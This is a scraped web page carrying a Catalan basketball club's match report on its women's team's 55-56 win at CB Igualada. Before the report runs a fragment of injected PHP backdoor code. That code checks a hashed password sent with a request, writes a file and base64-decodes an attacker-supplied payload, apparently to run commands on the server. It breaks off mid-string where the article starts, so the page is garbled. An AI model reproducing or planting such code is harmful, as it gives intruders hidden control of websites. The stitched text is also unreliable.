function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN sap patir i derrota al CB Igualada (55-56) - Tgn Bàsquet Club -

El TGN sap patir i derrota al CB Igualada (55-56)

Updated: gener 21, 2024

Partit corresponent a la catorzena i primera jornada de la 2a volta de Supercopa Catalunya femenina, on el Sènior A ha visitat la pista del CB Igualada, equip que arribava al partit amb el mateix balanç que les liles (6 victòries i 7 derrotes).

El partit ha començat amb un TGN molt endollat, amb la lliçó apresa del darrer partit davant del SESE. Les jugadores d’Israel Esteve han sortit a pista molt concentrades i conscients de la importància del partit. 7-14 era el marcador a l’equador del primer periode, però les locals han aconseguit frenar el bon inici de les liles i han escurçat diferències als últims minuts del quart (16-18).

Al segon periode s’ha mantingut l’intercanvi de cops entre els dos equips, evidenciant l’igualtat entre el CB Igualada i el TGN Bàsquet. 2 triples de les liles als últims minuts abans del descans (un de l’Andrea Sisniega i l’altre de la Laura Pascual) han deixat el marcador en empat a 30.

Després del pas per vestuaris, el TGN ha recuperat la iniciativa en el marcador, completant un gran tercer quart gràcies al joc col·lectiu de l’equip i el bon percentatge d’encert en els tirs de 2 (40-44). Tot i això, les igualadines no han perdut la cara al partit i han posat les coses molt difícils a les tarragonines.  2 triples d’Andrea Sisniega han situat el 45-51 al marcador a mitjans de l’últim periode, però les locals han contestat amb un parcial de 7-0 situant-se un punt per davant (52-51) a falta d’un minut per la conclusió del partit.

Ha sigut llavors quan ha tornat a aparèixer la MVP del partit, Pasku, qui ha tornat a capgirar el marcador enorme jugada individual que ha culminat amb un 2+1 i posteriorment ha anotat 2 tirs lliures més que col·locaven el 52-56 al marcador. El triple final del CB Igualada ha posat la por al cos de les liles, però la victòria ha acabat marxant cap a Tarragona!

A la propera jornada, el TGN rebrà la visita del líder, el Draft Gramenet el dissabte 27 de gener a les 16:00 al Sagrat Cor.